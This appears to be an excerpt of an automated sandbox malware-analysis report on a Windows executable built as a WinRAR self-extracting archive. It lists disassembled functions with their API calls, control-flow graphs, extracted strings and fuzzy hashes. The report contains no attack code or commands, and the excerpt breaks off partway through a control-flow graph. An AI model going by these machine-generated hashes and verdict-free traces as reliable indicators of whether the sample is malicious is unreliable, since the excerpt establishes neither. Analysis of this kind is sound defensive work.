                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000800), ref: 00D8C20F
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe), ref: 00D8C221
                                                                                      • GetLocalTime.KERNEL32(?), ref: 00D8C228
                                                                                      • _swprintf.LIBCMT ref: 00D8C267
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D8C279
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D8C27C
                                                                                      • LoadIconW.USER32(00000000,00000064), ref: 00D8C293
                                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 00D8C2E4
                                                                                      • Sleep.KERNEL32(?), ref: 00D8C312
                                                                                      • DeleteObject.GDI32 ref: 00D8C351
                                                                                      • DeleteObject.GDI32(?), ref: 00D8C35D
                                                                                        • Part of subcall function 00D8A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 00D8A92C
                                                                                        • Part of subcall function 00D8A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00D8A953
                                                                                      • CloseHandle.KERNEL32 ref: 00D8C39C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 985665271-2957653273
                                                                                      • Opcode ID: 886238570596f60b798bcf7e8c73448256050ee1543839f050c01cfa97784f39
                                                                                      • Instruction ID: 3ea48ac26b3f786570ada11e729109af20f31c2155451d03c0008eecdd8194db
                                                                                      • Opcode Fuzzy Hash: 886238570596f60b798bcf7e8c73448256050ee1543839f050c01cfa97784f39
                                                                                      • Instruction Fuzzy Hash: 7561C072904301EED321BB69EC4AF7B3BA8EB49750F044519F545D33A1EB799804CBB2
                                                                                      Function 00D88BD0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92memorywindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 598 d88bd0-d88beb FindResourceW 599 d88bf1-d88c03 SizeofResource 598->599 600 d88cc6-d88cc8 598->600 601 d88c23-d88c25 599->601 602 d88c05-d88c14 LoadResource 599->602 604 d88cc5 601->604 602->601 603 d88c16-d88c21 LockResource 602->603 603->601 605 d88c2a-d88c3f GlobalAlloc 603->605 604->600 606 d88cbf-d88cc4 605->606 607 d88c41-d88c4a GlobalLock 605->607 606->604 608 d88cb8-d88cb9 GlobalFree 607->608 609 d88c4c-d88c6a call d8e000 CreateStreamOnHGlobal 607->609 608->606 612 d88c6c-d88c84 call d88b65 609->612 613 d88cb1-d88cb2 GlobalUnlock 609->613 612->613 617 d88c86-d88c8e 612->617 613->608 618 d88ca9-d88cad 617->618 619 d88c90-d88ca4 GdipCreateHBITMAPFromBitmap 617->619 618->613 619->618 620 d88ca6 619->620 620->618
                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(00000066,PNG,?,?,00D89AC8,00000066), ref: 00D88BE1
                                                                                      • SizeofResource.KERNEL32(00000000,75295780,?,?,00D89AC8,00000066), ref: 00D88BF9
                                                                                      • LoadResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C0C
                                                                                      • LockResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C17
                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00D89AC8,00000066), ref: 00D88C35
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00D88C42
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D88C62
                                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D88C9D
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00D88CB2
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00D88CB9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                      • String ID: PNG
                                                                                      • API String ID: 3656887471-364855578
                                                                                      • Opcode ID: 4eaacbd400fe51b8390ed95a91ddeaa72a9f70428458ec92ba4275d9e073a8ff
                                                                                      • Instruction ID: 0486ba79e6ea16a42866d5b6356f818a97dedb36f0d8fe9e8dc6d7d2feafe61f
                                                                                      • Opcode Fuzzy Hash: 4eaacbd400fe51b8390ed95a91ddeaa72a9f70428458ec92ba4275d9e073a8ff
                                                                                      • Instruction Fuzzy Hash: CA213071602702AFC721AF61DD4996BBFA9EF8A791B090928F845D2264DF31D8049BB1
                                                                                      Function 00D7A273 Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 860 d7a273-d7a299 call d8cec0 863 d7a30d-d7a316 FindNextFileW 860->863 864 d7a29b-d7a2ae FindFirstFileW 860->864 865 d7a32c-d7a32e 863->865 866 d7a318-d7a326 GetLastError 863->866 867 d7a334-d7a3dd call d7f10e call d7b902 call d801c1 * 3 864->867 868 d7a2b4-d7a2cf call d7b275 864->868 865->867 869 d7a3e2-d7a3f5 865->869 866->865 867->869 875 d7a2e6-d7a2ef GetLastError 868->875 876 d7a2d1-d7a2e4 FindFirstFileW 868->876 878 d7a2f1-d7a2f4 875->878 879 d7a300 875->879 876->867 876->875 878->879 881 d7a2f6-d7a2f9 878->881 882 d7a302-d7a308 879->882 881->879 884 d7a2fb-d7a2fe 881->884 882->869 884->882
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A2A8
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A2DE
                                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A2E6
                                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A30E
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00D7A16E,000000FF,?,?), ref: 00D7A31A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                      • String ID:
                                                                                      • API String ID: 869497890-0
                                                                                      • Opcode ID: 5a86c168bc66a4e4ee8531f94cb6a8e255a43b1260dd8252e1431f9d231fa4b6
                                                                                      • Instruction ID: 79cc4fd41dbda0a3be5a78315b03d445db8a1e333c44d3c08c12411706769389
                                                                                      • Opcode Fuzzy Hash: 5a86c168bc66a4e4ee8531f94cb6a8e255a43b1260dd8252e1431f9d231fa4b6
                                                                                      • Instruction Fuzzy Hash: 4B414371608245AFC324EF68C884ADEF7E9FB89350F44461AF5DDD3240E774A9548BB2
                                                                                      Function 00D94A5A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002,00000000), ref: 00D94A7B
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00D94A30,?,00DA7F68,0000000C,00D94B87,?,00000002,00000000), ref: 00D94A82
                                                                                      • ExitProcess.KERNEL32 ref: 00D94A94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 36a93819ae73ba18f6e03918f82b6e9794b2e4fa8981082ef8c413761e85be78
                                                                                      • Instruction ID: dc1925edd593666d05474b380860e3be1b06d7339dde76ba86c7ac06fcb8a3fd
                                                                                      • Opcode Fuzzy Hash: 36a93819ae73ba18f6e03918f82b6e9794b2e4fa8981082ef8c413761e85be78
                                                                                      • Instruction Fuzzy Hash: 4DE0B631040608AFCF51AF64DD09E893F69EB51395F054414F8099A622CB35DD92CBB4
                                                                                      Function 00D78409 Relevance: 3.9, APIs: 2, Instructions: 888COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D7840E
                                                                                      • _memcmp.LIBVCRUNTIME ref: 00D78870
                                                                                        • Part of subcall function 00D780F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,00D786E9,?,-00000930,?), ref: 00D781BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharH_prologUpper_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 4047935103-0
                                                                                      • Opcode ID: 28f838c3004818eed356585465c53afff90e24d8207c2d584bf9890cb5caa075
                                                                                      • Instruction ID: 38e4bebedd1fbbe3c73562db6144032a90c803b00c9820e3620acbd35d127842
                                                                                      • Opcode Fuzzy Hash: 28f838c3004818eed356585465c53afff90e24d8207c2d584bf9890cb5caa075
                                                                                      • Instruction Fuzzy Hash: 67721B71944185AEDF25DF64C889BF9BBA9EF05300F0CC1BAE94D9B142EB319A84D770
                                                                                      Function 00D85984 Relevance: .3, Instructions: 325COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: ed0d55f82ddc073102539cf63fa7f030661ded478f569d5808011787d2a856f3
                                                                                      • Instruction ID: ac6747a46ae7872c225164fb711074031916f5122ade38c8df1e365150312445
                                                                                      • Opcode Fuzzy Hash: ed0d55f82ddc073102539cf63fa7f030661ded478f569d5808011787d2a856f3
                                                                                      • Instruction Fuzzy Hash: FBD116B16047458FCB14EF28D88479ABBE0FF95304F08056DEC849B646D334E959CBB6
                                                                                      Function 00D89B4F Relevance: 97.0, APIs: 46, Strings: 9, Instructions: 724COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D89B54
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prologItemTextWindow
                                                                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 810644672-581484061
                                                                                      • Opcode ID: 4e4c5e986fd0d0226c00e9beba2c2a7d7b9a963d92d098db338e27823f450e77
                                                                                      • Instruction ID: 222876fc7c5905706c06243b0a04a8fd5b2fc19b1bf0054f9fba6f461795cd0e
                                                                                      • Opcode Fuzzy Hash: 4e4c5e986fd0d0226c00e9beba2c2a7d7b9a963d92d098db338e27823f450e77
                                                                                      • Instruction Fuzzy Hash: 6542F371A40305EEEB21BB689C8AFBE3BACEB06740F484156F645E62D1D7754D84CB32
                                                                                      Function 00D7F353 Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314libraryfileloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 257 d7f353-d7f375 call d8cec0 GetModuleHandleW 260 d7f377-d7f38e GetProcAddress 257->260 261 d7f3c8-d7f62f 257->261 264 d7f3a0-d7f3aa GetProcAddress 260->264 265 d7f390-d7f39d 260->265 262 d7f635-d7f640 call d9462a 261->262 263 d7f6fd-d7f72e GetModuleFileNameW call d7b88c call d7f10e 261->263 262->263 273 d7f646-d7f673 GetModuleFileNameW CreateFileW 262->273 277 d7f730-d7f73a call d7a8e0 263->277 264->261 266 d7f3ac-d7f3c3 264->266 265->264 266->261 275 d7f675-d7f683 SetFilePointer 273->275 276 d7f6f1-d7f6f8 CloseHandle 273->276 275->276 278 d7f685-d7f6a2 ReadFile 275->278 276->263 284 d7f747 277->284 285 d7f73c-d7f740 call d7f309 277->285 278->276 280 d7f6a4-d7f6c9 278->280 282 d7f6e6-d7f6ef call d7ef07 280->282 282->276 291 d7f6cb-d7f6e5 call d7f309 282->291 286 d7f749-d7f74b 284->286 292 d7f745 285->292 289 d7f76d-d7f78f call d7b902 GetFileAttributesW 286->289 290 d7f74d-d7f76b CompareStringW 286->290 293 d7f791-d7f795 289->293 299 d7f799 289->299 290->289 290->293 291->282 292->286 293->277 297 d7f797 293->297 300 d7f79d-d7f7a2 297->300 299->300 301 d7f7d6-d7f7d8 300->301 302 d7f7a4 300->302 303 d7f8e5-d7f8ef 301->303 304 d7f7de-d7f7f5 call d7b8d6 call d7a8e0 301->304 305 d7f7a6-d7f7c8 call d7b902 GetFileAttributesW 302->305 315 d7f7f7-d7f858 call d7f309 * 2 call d7d142 call d73f5b call d7d142 call d88ccb 304->315 316 d7f85d-d7f890 call d73f5b AllocConsole 304->316 311 d7f7d2 305->311 312 d7f7ca-d7f7ce 305->312 311->301 312->305 314 d7f7d0 312->314 314->301 322 d7f8dd-d7f8df ExitProcess 315->322 321 d7f892-d7f8d7 GetCurrentProcessId AttachConsole call d920b3 GetStdHandle WriteConsoleW Sleep FreeConsole 316->321 316->322 321->322
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32 ref: 00D7F36B
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D7F383
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D7F3A6
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7F651
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D7F669
                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D7F67B
                                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00DA0858,00000000), ref: 00D7F69A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D7F6F2
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7F708
                                                                                      • CompareStringW.KERNEL32(00000400,00001001,00DA08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D7F762
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00DA0870,00000800,?,00000000,?,00000800), ref: 00D7F78B
                                                                                      • GetFileAttributesW.KERNEL32(?,?,00DA0930,00000800), ref: 00D7F7C4
                                                                                        • Part of subcall function 00D7F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
                                                                                        • Part of subcall function 00D7F309: LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
                                                                                      • _swprintf.LIBCMT ref: 00D7F834
                                                                                      • _swprintf.LIBCMT ref: 00D7F880
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • AllocConsole.KERNEL32 ref: 00D7F888
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00D7F892
                                                                                      • AttachConsole.KERNEL32(00000000), ref: 00D7F899
                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D7F8BF
                                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 00D7F8C6
                                                                                      • Sleep.KERNEL32(00002710), ref: 00D7F8D1
                                                                                      • FreeConsole.KERNEL32 ref: 00D7F8D7
                                                                                      • ExitProcess.KERNEL32 ref: 00D7F8DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                      • API String ID: 1201351596-3298887752
                                                                                      • Opcode ID: cdb122ba85e3cf30524fa2010be4802d9172e477a749c34b0c62c9bf6af394d1
                                                                                      • Instruction ID: 8c09c74265b8906c8d76421024a2f64295bded7780222a1b2b53bce659a76caa
                                                                                      • Opcode Fuzzy Hash: cdb122ba85e3cf30524fa2010be4802d9172e477a749c34b0c62c9bf6af394d1
                                                                                      • Instruction Fuzzy Hash: 5FD15DB10483849AD730EF60C849B9FBEE8EF86304F54892DF58996380D7B49548CBB7
                                                                                      Function 00D8AA45 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 404 d8aa45-d8aa5d call d8cdf0 call d8cec0 409 d8aa63-d8aa8d call d896ec 404->409 410 d8b645-d8b652 404->410 409->410 413 d8aa93-d8aa98 409->413 414 d8aa99-d8aaa7 413->414 415 d8aaa8-d8aab8 call d893ba 414->415 418 d8aaba 415->418 419 d8aabc-d8aad1 call d80b12 418->419 422 d8aade-d8aae1 419->422 423 d8aad3-d8aad7 419->423 425 d8b611-d8b63c call d896ec 422->425 426 d8aae7 422->426 423->419 424 d8aad9 423->424 424->425 425->414 441 d8b642-d8b644 425->441 427 d8ad9b-d8ad9d 426->427 428 d8acdd-d8acdf 426->428 429 d8aaee-d8aaf1 426->429 430 d8ad7e-d8ad80 426->430 427->425 434 d8ada3-d8adaa 427->434 428->425 435 d8ace5-d8acf1 428->435 429->425 433 d8aaf7-d8ab64 call d88b8e call d7b56e call d7a11c call d7a256 call d76fa3 call d7a1a9 429->433 430->425 432 d8ad86-d8ad96 SetWindowTextW 430->432 432->425 503 d8acc9-d8acd8 call d7a132 433->503 504 d8ab6a-d8ab70 433->504 434->425 438 d8adb0-d8adc9 434->438 439 d8acf3-d8ad04 call d94654 435->439 440 d8ad05-d8ad0a 435->440 443 d8adcb 438->443 444 d8add1-d8addf call d920b3 438->444 439->440 446 d8ad0c-d8ad12 440->446 447 d8ad14-d8ad1f call d89844 440->447 441->410 443->444 444->425 461 d8ade5-d8adee 444->461 451 d8ad24-d8ad26 446->451 447->451 453 d8ad28-d8ad2f call d920b3 451->453 454 d8ad31-d8ad51 call d920b3 call d920de 451->454 453->454 478 d8ad6a-d8ad6c 454->478 479 d8ad53-d8ad5a 454->479 465 d8adf0-d8adf4 461->465 466 d8ae17-d8ae1a 461->466 465->466 471 d8adf6-d8adfe 465->471 467 d8aeff-d8af0d call d7f10e 466->467 468 d8ae20-d8ae23 466->468 489 d8af0f-d8af23 call d9031b 467->489 472 d8ae30-d8ae4b 468->472 473 d8ae25-d8ae2a 468->473 471->425 477 d8ae04-d8ae12 call d7f10e 471->477 492 d8ae4d-d8ae87 472->492 493 d8ae95-d8ae9c 472->493 473->467 473->472 477->489 478->425 488 d8ad72-d8ad79 call d920ce 478->488 485 d8ad5c-d8ad5e 479->485 486 d8ad61-d8ad69 call d94654 479->486 485->486 486->478 488->425 505 d8af30-d8af83 call d7f10e call d89592 GetDlgItem SetWindowTextW SendMessageW call d920e9 489->505 506 d8af25-d8af29 489->506 528 d8ae89 492->528 529 d8ae8b-d8ae8d 492->529 500 d8aeca-d8aeed call d920b3 * 2 493->500 501 d8ae9e-d8aeb6 call d920b3 493->501 500->489 534 d8aeef-d8aefd call d7f0e6 500->534 501->500 515 d8aeb8-d8aec5 call d7f0e6 501->515 503->425 510 d8ab77-d8ab8c SetFileAttributesW 504->510 542 d8af88-d8af8c 505->542 506->505 511 d8af2b-d8af2d 506->511 516 d8ac32-d8ac3e GetFileAttributesW 510->516 517 d8ab92-d8abc5 call d7b100 call d7adf5 call d920b3 510->517 511->505 515->500 525 d8acae-d8acc3 call d7a1a9 